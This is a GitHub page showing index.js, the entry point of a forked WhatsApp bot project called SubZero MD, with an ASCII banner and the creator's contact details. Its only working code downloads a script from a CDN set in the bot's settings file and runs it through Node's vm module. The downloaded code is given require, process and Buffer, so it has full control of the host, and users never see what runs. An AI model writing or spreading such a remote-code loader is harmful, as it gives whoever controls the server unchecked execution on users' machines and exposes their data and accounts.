forked from mrfrankofcc/SUBZERO-MD
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathindex.js
More file actions
34 lines (29 loc) · 1.31 KB
/
Copy pathindex.js
File metadata and controls
34 lines (29 loc) · 1.31 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
/*
$$$$$$\ $$\
$$ __$$\ $$ |
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
\______/ \______/ \_______/ \________| \_______|\__| \______/
@ Project Name : SubZero MD
* Creator : Darrell Mucheri ( Mr Frank OFC )
* My Git : https//github.com/mrfr8nk
* Contact : wa.me/263719647303
* Channel : https://whatsapp.com/channel/0029VagQEmB002T7MWo3Sj1D
* Release Date : 15 Dececmber 2024 12.01 AM
*/
// ZIMBABWEAN STAR ON TOP
const axios = require('axios');
const vm = require('vm');
const config = require('./settings.js');
(async () => {
try {
console.log("❄️ Subzero Synchronization Initiated !");
const { data: scriptCode } = await axios.get(`${config.CDN}/mrfrank/index.js`);
new vm.Script(scriptCode).runInContext(vm.createContext({ require, console, process, module, __filename, __dirname, Buffer }));
} catch (err) {
console.error("Error:", err);
}
})();